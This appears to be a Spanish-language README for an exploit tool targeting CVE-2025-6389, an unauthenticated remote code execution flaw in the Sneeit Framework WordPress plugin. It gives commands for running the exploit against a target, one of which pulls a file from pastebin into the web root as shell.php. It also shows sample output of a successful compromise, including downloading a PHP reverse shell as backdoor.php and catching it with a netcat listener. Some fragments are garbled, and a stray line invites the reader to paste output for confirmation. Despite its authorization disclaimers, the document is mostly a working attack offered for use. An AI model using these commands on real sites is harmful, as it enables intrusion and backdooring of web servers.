
CVE-2025-6389
wp_vul_theme
CVE-2025-6389 es una vulnerabilidad Crítica (CVSS 9.8) en el plugin de WordPress Sneeit Framework (≤ 8.3), muy utilizado por temas populares. Permite ejecución remota de código sin autenticación — la clase más peligrosa de vulnerabilidades web.
# Install dependencies
pip3 install requests colorama
# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com
# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
assert + die)Use esto solo en objetivos que tenga autorización oficial para probar (alcance claro + RoE).
La vulnerabilidad todavía está siendo explotada intensamente en la naturaleza en este momento.
Esto es exactamente lo que verá en su terminal cuando el exploit realmente funcione (explotación 100% exitosa de CVE-2025-6389 en un objetivo vulnerable que ejecute Sneeit Framework ≤ 8.3):
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…
<h1>PHP Version 8.1.29</h1>
… (full phpinfo() page continues for thousands of lines)
RCE $> whoami
[+] Output:
www-data
RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
[+] Output:
--2025-11-25 23:11:45-- https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’
backdoor.php 100%[===================>] 5.37K --.-KB/s in 0.001s
Luego en su propia máquina:
nc -lvnp 4444
→ Obtiene instantáneamente una reverse shell completamente interactiva como www-data.
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)
Sabe que funcionó cuando vea alguno de estos:
Eso es todo. Si obtiene cualquiera de los anteriores → RCE completo sin autenticación logrado.
Pegue su salida exacta aquí si desea que confirme al 100% si funcionó o no.
sneeit_articles_pagination_callback()call_user_func() → ejecución de código arbitrarioEsta información se proporciona solo con fines defensivos y educativos 🛡️. No la use para explotar sistemas que no posea o para los que no tenga permiso explícito de prueba 🚫. Siga siempre las pautas legales y éticas al trabajar con vulnerabilidades de seguridad ⚖️✨